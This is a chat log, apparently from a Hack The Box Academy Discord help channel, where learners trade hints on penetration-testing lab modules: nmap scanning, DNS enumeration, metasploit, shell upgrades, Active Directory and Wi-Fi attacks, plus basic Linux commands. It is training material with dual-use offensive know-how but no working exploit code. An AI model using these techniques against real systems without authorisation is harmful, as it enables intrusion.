No admin page
#modules
cunning frigate
For example likely cross site scripting won't allow to read a file or run commands
ashen pollen
i got in with basic creds..
fathom pendant
i got in with basic creds..
KISS method baby
it's the getting started module, they won't have you do anything overly complex to get the answer
ashen pollen
it's the getting started module, they won't have you do anything overly complex ...
This is why i love talking to others while trying to solve it
its CMS 3.3.15
PHP Version 7.4.3 - OK
cURL Module Installed - OK
GD Library Installed - OK
ZipArchive Installed - OK
SimpleXML Module Installed - OK
chmod chmod - OK
Apache Web Server Apache/2.4.41 (Ubuntu) - OK
Apache Mod Rewrite Installed - OK
Im thinking about a reverse shell for the php maybe?
But i already have admin creds so idk
ashen pollen
mm yes
fathom pendant
Im thinking about a reverse shell for the php maybe?
seems potentially useful
ashen pollen
seems potentially useful
How do i use a exploit i found on searchsploit
fathom pendant
you can instead just do msfconsole -q then run a search in that
then you just use #
ashen pollen
i have msfconsole open in another terminal already
I was planning to try to do a HTTP attack at first
fathom pendant
why?
fathom pendant
yes, but why
ashen pollen
seemed to be a interesting way to attack as supposed to what i did
ashen pollen
yes, but *why*
i dont know it just struct me as the first possibility to attack
fathom pendant
everything you need to know to attack this box was taught to you by the module
ashen pollen
everything you need to know to attack this box was taught to you by the module
Which i did a month ago to be fair
fathom pendant
knowledge checks and skill assessments rarely deviate from what was taught/shown to you
fathom pendant
Which i did a month ago to be fair
then you should be taking adequate notes
ashen pollen
then you should be taking adequate notes
I don't take notes π
ashen pollen
I never was a note taker and i don't really know how too
fathom pendant
basics of note taking:
- rewrite in your own words
- highlight/mark anything you may not know
- do additional research for clarity
- make sure that you understand your notes
copy/pasting is useless if you still don't understand it
using a note-taking app like Obsidian you can also put images/screenshots in it to further strengthen your notes with the clear example of what you did
it can also be important to take note of if/when you run into errors, what your error was and what it looks like
and how you resolved
cunning frigate
You can use notion or obsidian and there are tons of resources online how to take notes for stuff like oscp or cyber generally
fathom pendant
but this is a field where not taking notes can have you spending hours looking for that one obscure stackoverflow article about some guy named denvercoder49 having the same issue as you with resolution.
consider your notes like a grimoire of knowledge.
as you use certain commands more often than others you'll get muscle memory for their syntax
i remember needing to look up the syntax a handful of times for xfreerdp /v:$TARGET /u:$TARGET-USER /p:$TARGET-PASSWORD /dynamic-resoution /drive:tools,/path/to/tools/ /cert-ignore
or python3 -c 'import pty; pty.spawn("/bin/bash")'
good notes will serve as a foundation for further learning as when you run into something later, you'll have something to refer to if you forgot what something is
as the tier 1 and 2 modules won't repeat the basic knowledge from tier 0
for instance these are the recommended modules to have a grasp of before doing the 'getting started' module
orchid furnace
Hi i am currently in the learning process model , I tried finding some ressources about the ROQ relationship oriented question model to understand it better but I failed finding such, as any search result either video or google does not give ROQ like if it only exists in htb, I hardly understand how to apply ROQ in everyday life without further examples than the one used on htb which talks about the methods we can use to access windows remotely, please help
waxen totem
I personally prefer drawing mind maps instead of writing notes because a picture is worth a thousand words and it also helps me visualize how I think about the concepts
waxen totem
Hi i am currently in the learning process model , I tried finding some ressource...
The ROQ iirc was made by HTB as a questioning model, it's designed not to get you to the answer but to get you to the right questions... I too have trouble with it but it's just a model that you can alter and reframe to suit your own needs, you don't need to follow it by heart
dim hound
Does someone else these warning also when executing cme?
hallow kiln
use netexec
cme is no longer maintained, so there will only be more errors going forward
dim hound
aw cool! π I am going to use that one instead
brave scroll
Attacking Common Services - Medium
Have done NMAP Scan manytimes, but when read forum, i come to know port 30021 is running ftp, but can anyone tell me how can i know on which it is running if i don't want to take forum help.
I hope someone got my point what i am trying to say
toxic apex
has anyone figured out how to make krbrelayx.py work on the current pwnbox? It just always complains about getting the wrong auth type and never saves a TGT. no matter how it is installed, what version of impacket you use, even if you rm -rf your python lib folder and reinstall it.
hallow kiln
Attacking Common Services - Medium
Have done NMAP Scan manytimes, but when read...
you scan all ports, in your screenshot you're running the most basic nmap scan with zero flags
brave scroll
you scan all ports, in your screenshot you're running the most basic nmap scan w...
i already have tried the flags but saem result, i have send here for clean look.
hallow kiln
this once again isn't scanning all ports
brave scroll
this once again isn't scanning all ports
u know all port scanning take 2 hours.
hasty mauve
-p- is the flag to scan all ports
brave scroll
are u sure doing this is a good practice?
hasty mauve
u know all port scanning take 2 hours.
run it with -T5 or for even faster scanning --min-rate <N> where <N> is the number of minimum requests to send per second.
hallow kiln
for the course and boxes, yes, for real life, not really
rugged linden
hi can i ask are we supposed to follow along the website instructions for the informaiton security foundations modules, setting up section?
rugged linden
oh okay, thanks
i was confused as when i opened the instance there were files i could not find as shown in the website
fathom pendant
Well the instance isn't gonna really have what's shown
As that's an in-browser vm
Already configured
rugged linden
understood, ty
ocean night
What's this from?
ocean night
Ok, please don't repost content from modules over Tier 0
Ask your question without the screenshot π
glad patio
What's this from?
I've already found the answer by looking at the structured logs on the screenshots. Yet, I don't know how to order my output to get the same answer
glad patio
Ok, please don't repost content from modules over Tier 0
Sure, sorry. I didn't think about that
ocean night
np π
west zodiac
From Footprinting, Domain Information, DNS Records
I was running DNS command but it was not working and cant query my dns server and it returned this:
dig any inlanefreight.com
;; Connection to 192.168.204.2#53(192.168.204.2) for inlanefreight.com failed: timed out.
;; no servers could be reached
Then i ran and it showed:
dig any inlanefreight.com @ 8.8.8.8
; <<>> DiG 9.20.2-1-Debian <<>> any inlanefreight.com @ 8.8.8.8
...
;; ANSWER SECTION:
inlanefreight.com. 300 IN A 134.209.24.248
...
inlanefreight.com. 300 IN SPF "v=spf1 include:_spf.google.com include:mail1.inlanefreight.com include:google.com ~all"
;; Query time: 184 msec
;; SERVER: 8.8.8.8#53(8.8.8.8) (TCP)
;; WHEN: Tue Dec 24 19:21:30 PKT 2024
;; MSG SIZE rcvd: 368
So the question is am i missing out any data if im doing it the second way. Is it ok to normalize using @ 8.8.8.8 everytime i use dns command. Ive confirmed from gpt its fine but need second opinions.
fathom pendant
What module and section are you working on?
If it's a private ip you use the ip as the @ i.e. dig axfr inlanefreight.htb @10.129.0.5
Otherwise it uses your default dns configuration
Usually through your isp
fathom pendant
From Footprinting, Domain Information, DNS Records
I was running DNS command bu...
Also you @ a random person named changme when copy/pasting
But if it's a public website using any nameserver as the @ is fine
west zodiac
Ok i understand, thank you for your time.
fathom pendant
From Footprinting, Domain Information, DNS Records
I was running DNS command bu...
From this it looks like it's just trying to query locally
lofty crag
If the tier of a module is not based on its difficulty, what is it based on?
acoustic owl
I do think that the tier level classifies the difficulty. Why do you think that's not the case?
lofty crag
I do think that the tier level classifies the difficulty. Why do you think that'...
In the "intro to academy" module, it says that is not the case
lofty crag
I do think that the tier level classifies the difficulty. Why do you think that'...
Last sentence in the screenshot above
alpine pond
hi guys,
Has anyone experienced firewall issues in the MSSQL, Exchange, and SCCM Attacks (Introduction to SCCM) module?
proper hare
hey guys, i got an issue in this question i don't know what is the password a bypassed the filter but i don't know the password i tried to hack it but there is no clients on it:
Execute the MAC Filtering bypass as demonstrated in the section to establish a connection to the 5 GHz band. Once connected, locate the flag at IP address 192.168.2.1.
btw why i can not send an image ?
cloud urchin
btw why i can not send an image ?
follow the instructions in #welcome
umbral badger
What could cause the eror running parrot here
proper hare
follow the instructions in <#477042232109826048>
i can not identfiy my self!
umbral badger
and helllo
storm elk
i can not identfiy my self!
Dm me
ocean night
What could cause the eror running parrot here
Have you searched for the error message at all?
Because I see lots of information out there
(I don't know how to solve this directly)
umbral badger
It said that may be CPU storage issues
ocean night
Did you find any articles that described this problem?
There are.. loads of links there
Literally Googling the error message
I can't say any of them will help, but I'm just saying.. there's quite a bit of info out there describing this issue, and potential solutions
Have you tried any of them?
autumn cradle
Hello,
Is it normal that all machines are down for the Linux privilege escalation module (the Miscealnous Technique & Kernel Version part). Impossible to maintain a connection in SSH more than 2 minutes. I've had this problem since yesterday. I tried with the online PWNBox and also vpn from my PC.
ocean night
You likely have more than one VPN connection open at the same time
Close any Pwnbox instances, and reboot your PC
sonic seal
Does anyone help me with my mistake?
dapper moth
Does anyone help me with my mistake?
It's hardly visible
sonic seal
It's hardly visible
I will send you better
naive cedar
sonic seal
Now is it better?
proper hare
what is the password π
dapper moth
Now is it better?
You're getting some timeout error, try taking the -c and the --kerberos flag out and see if it will work
plush lotus
trying to find all installed packages on target. the number is incorrect. i searched for dpkg.
also have not figued out how to take screen shots on parrot os
gentle carbon
I recall coming across a GitHub repository in one of the modules that contains benign Windows files useful for writing YARA rules. I checked the YARA & Sigma module but couldnβt find the link. Does anyone else remember or know where to find it?
sonic seal
You're getting some timeout error, try taking the -c and the --kerberos flag out...
Same error... I don't understand, because I introduced everything in the section
hasty mauve
Same error... I don't understand, because I introduced everything in the section
Perhaps try to see if there's a flag to increase the time out
sonic seal
Perhaps try to see if there's a flag to increase the time out
3.123 and 3.120 seconds, more or less the same
cobalt aspen
Module: AD Enumeration And Attacks
Section: DCSync
Am i the only one facing this issue? I reseted machines multiple times, and changed vpn server.
rustic sage
Hi everyone
cloud urchin
Module: AD Enumeration And Attacks
Section: DCSync
Am i the only one facing this...
can you ssh in?
cobalt aspen
I will just do this section via Windows machine
Ssh also didnt work
I could run ligolo agent on windows machine also
fervent hull
Where can i add image to the chat?
fervent hull
i got this error Identification error: please contact an online Moderator or Administrator for help.
plush lotus
having and issue here
fathom pendant
Then reach out to a mod [the people with shields next to their name]
cloud urchin
how's this work? how do i have a 1 year mark a month ago but 2 year mark 9 hours ago?
fathom pendant
having and issue here
apt list --installed | grep -iv listing | wc -l
fathom pendant
how's this work? how do i have a 1 year mark a month ago but 2 year mark 9 hours...
Probably when they added them
plush lotus
`apt list --installed | grep -iv listing | wc -l`
ok how that line any differnt then what i typed
fathom pendant
ok how that line any differnt then what i typed
Because .dpkg is if you're installing from source via dpkg
plush lotus
ok
fathom pendant
I'm gonna go out on a limb and assume you chatGPTed it
plush lotus
I'm gonna go out on a limb and assume you chatGPTed it
no i didnt.
fathom pendant
The command i gave grabs the list of installed tools; cuts out a line which is unnecessary; then counts it
gusty bronze
Any hacker here ??
plush lotus
I'm gonna go out on a limb and assume you chatGPTed it
ive use to use ubuntu 10 years ago so i assumed that would have been the file name
gusty bronze
Any HACKER here ??
fathom pendant
ive use to use ubuntu 10 years ago so i assumed that would have been the file na...
Again .dpkg is if installing via source
Not from repo
fathom pendant
Any HACKER here ??
The fuck do you want; mind the #rules before you ask
fathom pendant
Whats going on can you please explain md
I'm assisting someone with a linux basics issue
Yeah but why do you need a "hacker"?
If you want to start learning
compact patrolBOT
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
gusty bronze
Are you hacker ?
gusty bronze
I will go but can you tell me
fathom pendant
Why does it matter
gusty bronze
I am a Indian guy and i am new in Hackthebox, i want to be a hacker
compact patrolBOT
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
fathom pendant
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-...
. Read this link
fathom pendant
Learn your basics.
gusty bronze
Ok
gusty bronze
Are you a pro hacker, how long did it take
delicate steeple
Hey everyone merry x mass!
if someone has the time to help me out with
Attacking Common Services
Attacking Email Services
i am a the question
What is the available username for the domain inlanefreight.htb in the SMTP server?
i have tried using patator,hydra and smtp-user-enum with the users and pw given by htb
i seem to not be able to find the user, can someone nudge me in the right direction?
plush lotus
apt list --installed | grep -iv listing | wc -l ok so when i used grep -c | wc -l no results i am confused why you used -iv when i looked up /man grep.... it did not list that as an option
plush lotus
Learn your basics.
apt list --installed | grep -iv listing | wc -l ok so when i used grep -c | wc -l no results i am confused why you used -iv when i looked up /man grep.... it did not list that as an option
fathom pendant
apt list --installed | grep -iv listing | wc -l ok so when i used gre...
-i and -v
Many commands you can combine the arguments
gusty bronze
How can i hack a nearby wifi network, can anyone guide me
fathom pendant
Like nmap -sS -sU -sV can be combined to -sSUV
plush lotus
Like nmap -sS -sU -sV can be combined to -sSUV
that is for all pipes
fathom pendant
ok so you dont seperate is there a limit on combinations
Depends on the command and arguments
Do this apt list --installed | head
And you'll see what you may or may not need to inverse grep (-v)
plush lotus
Depends on the command and arguments
i didnt follow
fathom pendant
i didnt follow
There's an extra line you need to account for when counting the lines π
plush lotus
but the answer was in the ___ range this only shows a few
safe star
Hey everyone merry x mass!
if someone has the time to help me out with
Attackin...
Try adding the -w flag to smpt enum
fathom pendant
but the answer was in the ___ range this only shows a few
...lead a horse to water
You don't pipe that to wc
plush lotus
...lead a horse to water
i like you haha got you
fathom pendant
You pipe apt list --installed
Now you understand the need for the grep -iv [use man grep to figure out what those options do]
delicate steeple
Try adding the -w flag to smpt enum
i will try this ty
fathom pendant
Yeah smtp is a slow service
plush lotus
Now you understand the need for the `grep -iv` [use `man grep` to figure out wha...
thank you. for taking the time to break the line down. i not only want to understand what is being typed but why as well.
fathom pendant
thank you. for taking the time to break the line down. i not only want to under...
The modules have you engage in some critical thinking to solve them
man <command> and <command> --help are your biggest friends
plush lotus
The modules have you engage in some critical thinking to solve them
very much so. am am also doing this on a free account
fathom pendant
Β―_(γ)_/Β―
Often if I'm asking why youre doing something a certain way, I'm challenging you to think why you did something (often wrong)
rough violet
learning about /dev/null
fathom pendant
And to ask the question "wait how do I <do thing>?"
fathom pendant
learning about `/dev/null`
always with find / ... 2> /dev/null 
rough violet
honestly it's a heavy load of new information in the linux fundamentals module,
it's what I need to learn linux but damn how am I supposed to learn all that it would take me a lot of time
fathom pendant
honestly it's a heavy load of new information in the linux fundamentals module,
...
rough violet
always with `find / ... 2> /dev/null` <:Prayge:780619715940057099>
yessir, we don't want stderr, don't want the permission denied, would miss up out wc
fathom pendant
Typically pipes only redirect stdout, not stderr without prodding
rough violet
https://tenor.com/view/sinead-persaud-shipwrecked-comedy-shipwrecked-poe-party-p...
i take screenshots, re-write some stuff to memorise, like descriptions of directories in the filesystem hierarchy, linux philosophy and its structure, architecture,
practice some stuff, but still like it takes time
fathom pendant
Tbh I don't have deep notes of linux filesystem stuff
rough violet
Typically pipes only redirect stdout, not stderr without prodding
oh, good to know
fathom pendant
Just what I typically need to know
plush lotus
i am in this mod right now
fathom pendant
Such as
/dev/ < devices
/home/ < users
/root/ < magical wonderland
plush lotus
its the first one i went to
fathom pendant
Also remember, the only person that needs to understand your notes is you
So however you feel you need to organize is up to you
eternal warren
Abi
plush lotus
Also remember, the only person that needs to understand your notes is you
oh yes. plenty of notes.
eternal warren
Hi
fathom pendant
Also a recommendation is to go back every now and then to readjust your notes
I.e. rerun a module you completed and readjust your notes
fathom pendant
We're not gonna reverse a random b64 string from some nobody
<@&861185840277487616>
It was deleted the first time,that should have been your hint that it doesn't belong here
plush lotus
I.e. rerun a module you completed and readjust your notes
will keep in mind
eternal warren
Hey marcielee Add me I'll send you something
fathom pendant
Hey marcielee Add me I'll send you something
Fuck off
dark hedge
Who wants to do this? cipher text
please dont drop strings into chat
and stop bothering them
eternal warren
No, I'm not deciphering some random string.
Come on
eternal warren
Ok bro
fathom pendant
@plush lotus don't dm without asking
plush lotus
<@1311932654114836553> don't dm without asking
ok
delicate steeple
Try adding the -w flag to smpt enum
i am not succeeding with this :/
fathom pendant
i am not succeeding with this :/
How long are you telling it to __w__ait?
~25 seconds seems to be the most reliable
delicate steeple
i did 5 i will try 25
pine dune
Hi guys, wanted to ask if whether in the cbbh pathway, does it cover some sort of linux/windows priv escalation as to my knowledge 99% (if not 100%) of the boxes on htb require some sort of privilege escalation. If cbbh doesn't cover this, then should we complete it and then go over to complete linux/windows priv escalation?
acoustic owl
CBBH refers only to the website, not to the server. PrivEsc on the server is not an issue for CBBH
fathom pendant
Hi guys, wanted to ask if whether in the cbbh pathway, does it cover some sort ...
Cbbh is about web exploits, not privesc/pentest
pine dune
CBBH refers only to the website, not to the server. PrivEsc on the server is not...
ok just a bit confused because I rememeber asking that if whether cbbh pathway was enough to complete boxes and people said it was, so was wondering how people did the privilege escalation
pine dune
Cbbh is about web exploits, not privesc/pentest
yeah I know, but then thats not enough to complete the boxes?
fathom pendant
It's enough to get your foot in the door and google fu the resy
pine dune
It's enough to get your foot in the door and google fu the resy
ahh ok
fathom pendant
Rest*
acoustic owl
ok just a bit confused because I rememeber asking that if whether cbbh pathway w...
It may have been confused with CPTS, or perhaps only the web area of a box was meant
pine dune
It may have been confused with CPTS, or perhaps only the web area of a box was m...
ahh I see
delicate steeple
~25 seconds seems to be the most reliable
sadly still nothing
plush lotus
ok i have a feeling i was suppose to do the networking fundamentals pior to linux.
fathom pendant
Networking fundamentals is just networking 101 stuff
plush lotus
Networking fundamentals is just networking 101 stuff
keep in mind i do not work in IT. this is a self motivated adventure. the only people i have as a mentor is right here. i am starting from scratch here.
fathom pendant
keep in mind i do not work in IT. this is a self motivated adventure. the only p...
Networking 101 is stuff you can learn in 5 minutes on YouTube
Basics of private, public, and CIDR ranges
plush lotus
How many services are listening on the target system on all interfaces? (Not on localhost and IPv4 only)
how do you explain this question
fathom pendant
How many services are listening on the target system on all interfaces? (Not on ...
netstat is helpful
It's asking; how many services are listening [i.e. a web service], excluding IPv6 and localhost [127.0.0.x]
plush lotus
`netstat` is helpful
what is blowing my mind is in the lesson it never once mentioned that. it talking about | more | less | head | tail | sort | grep | cut | tr | column | awk | sed | wc
fathom pendant
Yeah some of the sections seem out of order
plush lotus
a little.
fathom pendant
But this is pretty simple stuff tbh
netstat < network statistics
For basic commands try and have ways to memorize them
ls list stuff
mkdir make directory
plush lotus
in understand it is suppose to be simple. but how do i go about learning this without always asking for help. should i skip a lesson to see if the next one leads a hint since its out of order
opal nexus
In 'Attacking Wi-Fi Protected Setup (WPS)' module --> 'Online PIN Brute-Forcing Using Reaver' section - the reaver bruteforcing should take some time?
fathom pendant
in understand it is suppose to be simple. but how do i go about learning this wi...
"How do I do X in linux"
And asking for help isn't bad, it's how you ask for help that can be an issue.
If you're just asking for answers you're not learning anything
It's why giving vague but direct enough hints usually tips people in the right direction
fathom pendant
Google isn't a boogeyman
plush lotus
hah
fathom pendant
Again asking for help isn't a negative
We all start somewhere
A couple years ago I wouldn't have known wtf to do with an nmap scan
plush lotus
We all start somewhere
your right just dont want to be a pester
cloud urchin
i would wager marcielee feels the same way i do, but i enjoy helping people who want to learn. the key is you need to put effort in, but if you do and you're just banging your head against the wall and need a nudge or explaination, you're not a pester at all. just make sure you put in your effort.
fathom pendant
your right just dont want to be a pester
If you don't wanna pester, discord has a handy search feature
It's why we push people to use module and section name
Your confusion on something is almost guaranteed to not be original
plush lotus
If you don't wanna pester, discord has a handy search feature
how do i go about using this feature
fathom pendant
Ctrl-f on desktop. Magnifying glass icon on mobile
plush lotus
perfect i will use all resources. thank you.
opal nexus
Did You solve this thing eventually?
When I run the Reaver bruteforce It get stuck on the beacon part..
cursive marsh
Guyss I desperately need your help, I have been fighting the "Intro to Academy's Purple Modules" for 5 hours now, and I can't figure it out:
Usage Example: Zabbix CVE-2024-22120
Academy says:
Let's navigate to the bottom of this section and click on 'Click here to spawn the target system!'. Then, let's SSH into the target IP using the provided credentials. The vast majority of the actions/commands covered from this point up to the end of this section can be replicated inside the target, offering a more comprehensive grasp of the topics presented.
But there is no credentials provided in the whole page.
dark hedge
should be at the bottom of the page where the questions are, if there are any questions
real chasm
Try and refresh the page maybe...
cursive marsh
Already done that, it's driving me crazy at this point
real chasm
Damn
cursive marsh
Like it says connect trough SSH
But it just doesn't give me ANY credentials to SSH
fathom pendant
Like it says connect trough SSH
Is there credentials supplied in the overview section?
:)
opal nexus
In 'Attacking Wi-Fi Protected Setup (WPS)' module --> 'Online PIN Brute-Forcing ...
OK, to solve this - reset the target machine....
cursive marsh
Is there credentials supplied in the overview section?
Overview as in the top?
fathom pendant
Sometimes they'll drop credentials in the first sections
cursive marsh
Just this
fathom pendant
Overview as in the top?
Overview as in first section
fathom pendant
dark hedge
those are probably your creds
fathom pendant
And this, but no clue what they mean by "administrator role" for now:
This looks like maybe windows
But could be linux
Ah those creds are for the web page
cursive marsh
those are probably your creds
Tried, that's just the login credentials for zabbix, the web page
fathom pendant
https://academy.hackthebox.com/module/257/section/3213
. Try these creds?
cursive marsh
No way, I read that part yesterday I fear the worst
dark hedge
not sure then, haven't done the module myself
fathom pendant
Oh
cursive marsh
. Try these creds?
LOL ur the best, i completely forgot that part
fathom pendant
You're massively misunderstanding something
cursive marsh
It's just a skill issue in this case, and trust me, I've been struggling for over 3 hours this time
fathom pendant
cursive marsh
Oh yea, I've already done that part haha
Thank you big time bro, you saved me a LOT of headache
cursive marsh
Just as the current user, tried privesc but wasn't able to
I did sudo -l and it said I had vim permission NOPASSWD, but if I ran vim in the shell, it just timed me out
fathom pendant
Yeah you need an interactive shell to use vim
But you shouldn't need to privesc afaik
cursive marsh
I had no access to the root folder where the txt was located at tho
fathom pendant
Β―_(γ)_/Β―
zealous rune
hi i'm struggling my way through the skills2 assessment on Attacking AD. I've managed to obtain a hash for mssqlsvc, but I cannot get a cleartext password. Looking at the solution I see that it's possible to get the cleartext password for this account. Am I missing something?
plush lotus
Determine what user the ProFTPd server is running under. Submit the username as the answer.
zealous rune
Determine what user the ProFTPd server is running under. Submit the username as ...
that's not to me i think?
dark hedge
it's not
zealous rune
phew!
rough violet
so guys, writing a command in the stdin doesn't work? gotta only provide files for stdin?
first command is actually irrelevant, i wrote before it echo "test" > test.txt
delicate steeple
Hey everyone merry x mass!
if someone has the time to help me out with
Attackin...
i am still very stuck with this :/
rough violet
aight go the EOF part
now I want to know: does stdin allow commands, or only files?
apparently it doesn't allow commands cuz bash is expecting a file or directory
fathom pendant
aight go the EOF part
https://www.gnu.org/software/bash/manual/html_node/Redirections.html 3.6.6 Here Documents
Single < is read file
rough violet
Single < is read file
cool, ty
ripe wadi
hi guys
ocean night
@ripe wadi there will be a spawn target button with the questions
Don't just paste the question from the section
You are meant to find the answer yourself, using the skills learned in the sections completed previously
ripe wadi
yeah bu the point is that i haave to enum a domain
ocean night
Yes
ripe wadi
what does the target have to do with this
ocean night
So, what did you learn about techniques on enumerating domains in the previous sections?
ripe wadi
like use it as a nameserver >
ocean night
Yes
fathom pendant
like use it as a nameserver >
Bingo
fathom pendant
Critical thinking is required to be successful
ripe wadi
they could have said it π
ocean night
It says target
ripe wadi
that is not critical thingking its a random ip
ocean night
We do accept feedback mind
fathom pendant
They're assuming {{ braincell -gt 1}} 
ripe wadi
It says _target_
i thought i had to ssh into it
ocean night
How would you better present it?
fathom pendant
i thought i had to ssh into it
Do the instructions say "ssh"?
pine dune
Hi guys, Im gonna do a htb study sesh in a little while, and listen to some music. If anyone wants to join me, pls dm
ripe wadi
Do the instructions say "ssh"?
it just says target
zealous rune
hi i'm struggling my way through the skills2 assessment on Attacking AD. I've m...
does this make sense to anyone?
fathom pendant
If there's no explicit instruction to ssh/rdp/remote into a target, then it's not necessary
ripe wadi
How would you better present it?
well instead of target say spawn nameserver
ocean night
When given a target, think to what services you have been working on
..and learning about
fathom pendant
well instead of target say spawn nameserver
That's gonna be difficult given how the backend works
plush lotus
@fathom pendantDetermine what user the ProFTPd server is running under. Submit the username as the answer. how do i find the sever
ripe wadi
That's gonna be difficult given how the backend works
its a frontend change
just swap the text on a page
fathom pendant
<@134323136853311488>Determine what user the ProFTPd server is running under. Su...
I believe netstat or some other tool can give info
ocean night
Everything is simple when you are not the one making the change
ripe wadi
ok anyway, thanks
fathom pendant
<@134323136853311488>Determine what user the ProFTPd server is running under. Su...
ProFTPd is running on the target, don't overthink
ocean night
Good luck!
ripe wadi
Everything is simple when you are not the one making the change
as a dev if you have to make a lot of changes to the codebase just to swap a frontend text its not a good codebase
fathom pendant
ps is good for processes
fathom pendant
as a dev if you have to make a lot of changes to the codebase just to swap a fro...
You're vastly underestimating the work required lmao
ocean night
Again, everything is simple when you're not the one making the change
Yes, it should be simple
but it's not just the frontend work
addition of a DB field
populating all section questions
fathom pendant
Not to mention change reviews and such
fathom pendant
Most people don't have issues understanding target would == nameserver in this instance though
ripe wadi
addition of a DB field
your frontend static button text is saved in a db?
just curious
ocean night
What?
fathom pendant
How it interacts with the backend is
ripe wadi
How it interacts with the backend is
the req is the same
ocean night
I'm not going in to specifics of the codebase
Just.. please
I've been doing this for long enough
ripe wadi
ok
ocean night
Thank you for the suggestion
ripe wadi
fair, thanks for the help again
fathom pendant
Not necessarily, and without knowing the specifics of the codebase [as gob said] it's easy to go "just change this for this one specific instance"
plush lotus
`ps` is good for processes
i am struggling because i have yet learned ps netstat or any of the others that have been suggested. i am still in workflow section linux fund.
delicate steeple
i am still very stuck with this :/
i found it! been staring to long at it guess so made a mistake
ripe wadi
I'm not going in to specifics of the codebase
someone has studied their modules in social engineering 
fathom pendant
i am struggling because i have yet learned ps netstat or any of the others that ...
man ps
Look for "user"
fathom pendant
i found it! been staring to long at it guess so made a mistake
Mood, the snmp stuff is similar, you're staring at it and think it's just an info message
ocean night
π
fathom pendant
π
They're saying they are
By getting you to talk about the codebase
I guess
Β―_(γ)_/Β―
ripe wadi
bruh
fathom pendant
I read your replies as broad things that need to happen for a module to be updated
Β―_(γ)_/Β―
fathom pendant
ok so am i suppose to use locate with pipe ps
Why locate?
plush lotus
thats the modual i am in
fathom pendant
But why would you use locate to search for a substring
plush lotus
this is why am i am confused in finding the answer. the past three lessons has had nothing but how to locate files
fathom pendant
grep searches for substring within files/output
echo -E "foo\nbar" | grep "foo"
To extend ps [options] | grep -i proftpd
-i ignores case
It's useful if you're unsure how the output would format or if you're looking for multiple instances where the word may be case shifted
locate is useful for finding files [if they are cached for locate to pull]
gray yacht
hi i'm struggling my way through the skills2 assessment on Attacking AD. I've m...
I don't think i needed the password for that account to complete that assessment.
plush lotus
`grep` searches for substring within files/output
i does not define a user
zealous rune
no i didn't need the password was able to use the hash and progress
however the solution suggested the password was obtainable and I wondered if I had missed something
gray yacht
however the solution suggested the password was obtainable and I wondered if I h...
Idk, I don't have access to solutions, so I never worried about it.
zealous rune
I find it useful to check as sometimes i did things different to the solutions in the questions
i learn stuff forom the solutions too
gray yacht
I find it useful to check as sometimes i did things different to the solutions i...
Yeah that makes sense and id do the same.
delicate steeple
Mood, the snmp stuff is similar, you're staring at it and think it's just an inf...
π€£
fathom pendant
i does not define a user
There's an option for ps to show u
__u__sers
rough violet
guys is WEP still used?
isn't it replaced by WPA encryption?
ocean night
I really hope not.. but no doubt there will be some out there
"if it works don't fix it"
WPA3: 28,562,179 (1.92%)
WPA2: 1,109,295,965 (74.66%)
WPA: 38,442,957 (2.59%)
WEP: 42,346,020 (2.85%)
????: 237,250,229 (15.97%)
None: 30,655,313 (2.06%)
42 Million is.. quite a lot
How many are still active, who knows
cloud urchin
https://wigle.net/ this page has always been interesting to me, it shows a graph over time of encryption types for the uploaded stats.
rough violet
How many are still active, who knows
thanks for the clarification
ripe wadi
btw guys how can i use the vpn in htb academy
My current situation is
i have a config file i have downloaded from the page
cloud urchin
use it with openvpn
ripe wadi
and ran sudo openvpn --config ./academy-regular\(5\).ovpn
and after trying to reach tthe target ip
it says that it is down
cloud urchin
don't run the vpn and pwnbox at the same time. your command might work idk. i just use openvpn <file> &
ripe wadi
don't run the vpn and pwnbox at the same time. your command might work idk. i ju...
so to terminate my pwnbox ?
cloud urchin
your pwnbox and the vpn share the same ip, so you can't run them at the same time without running into problems. one or the other.
cloud urchin
not sure, if it doesn't work still probably a good idea.
ripe wadi
from my pc or is there some panel in the website
plush lotus
from my pc or is there some panel in the website
are you running linux?
plush lotus
then delete all files in the downlads file for htb
plush lotus
sudo openvpn ~/Downloads/academy-regular.ovpn@ripe wadi you can thank @fathom pendant for this resolve
cloud urchin
the issue is you can't run the pwnbox and vpn at the same time...
ripe wadi
the issue is you can't run the pwnbox and vpn at the same time...
i stopped it
dark hedge
if you are using pwnbox, you don't use the VPN. it's already connected to the network
the VPN is for connecting to the HTB network on your own VM
cloud urchin
if you can run a VM, i'd suggest doing that as the experience will be a lot easier. no reason other than preference or hardware limitations.
dark hedge
you don't have to create a VM, and it already has most tools you need. but you can always just make your own VM and install the tools you need
VM is the proper experience
rough violet
what does that mean
dark hedge
and it's probably what you'd be doing when you're doing engagements
dark hedge
what does that mean
sed is a binary that lets you search for text based on a user-supplied regular expression (regex)
regexes are basically used to find/filter for specific characters or phrases within some string
silk otter
Hey I am struggling on the CDSA module 'Windows attacks & Defense' Section PKI - ESC1. From what I am reading, the lab assumes we already have access to the PKI machine because it starts off with a windows screenshot using the CERTIFY tool. I do not get any instruction from the lab on how to access the machine until a bit down the page
Enter the password for eagle\htb-student:
Attempting to start powershell as user "eagle\htb-student" ...```
This again, is not a kali based command, so it does not work for me. I then go down a bit more towards the questions and get this information.
```Please wait for 7-10 minutes after spawning the target of the below questions before requesting/generating any AD certificates!
For improved RDP performance, it is recommended to first SSH to the kali host while enabling dynamic port forwarding, followed by an RDP connection to WS001 from your attack host utilizing proxychains.```
So i do just that. I SSH into the machine using the given credentials in the questions in the bottom with port forwarding. I successfully get in kali. Awesome. Now here is the problem. I try to xfreerdp into the windows machine and I get this error
```[17:20:09:558] [8621:8621] [ERROR][com.freerdp.client.x11] - failed to open display:
[17:20:09:558] [8621:8621] [ERROR][com.freerdp.client.x11] - Please check that the $DISPLAY environment variable is properly set.```
I have tried to use 'export display=[local ip]:0.0' to help the issue. Still didnt work. I have tried xfreerdp into both the kali and windows machines. Didnt work. I have tried SSHing into bothe machines, I cannot do that due to the windows machine not being pingable. Basically, I tried all sorts of combonations. I have been at this course for about 6 months and these are my final questions. If anyone can help me it would make my day. Thanksdo u guys recommend any video resources to help with for example Linux Fundamentals module or any?
I get this field requires a lot of research and that means reading text but still it's better whenever there's visual media
cloud urchin
Hey I am struggling on the CDSA module 'Windows attacks & Defense' Section PKI -...
Reading the page, it looks like the target you spawn is a Kali box. If you can't RDP into it from your VM try the pwnbox. If you can't do that, you can still just setup something like chisel and proxychain your way into WS001 with xfreerdp.
silk otter
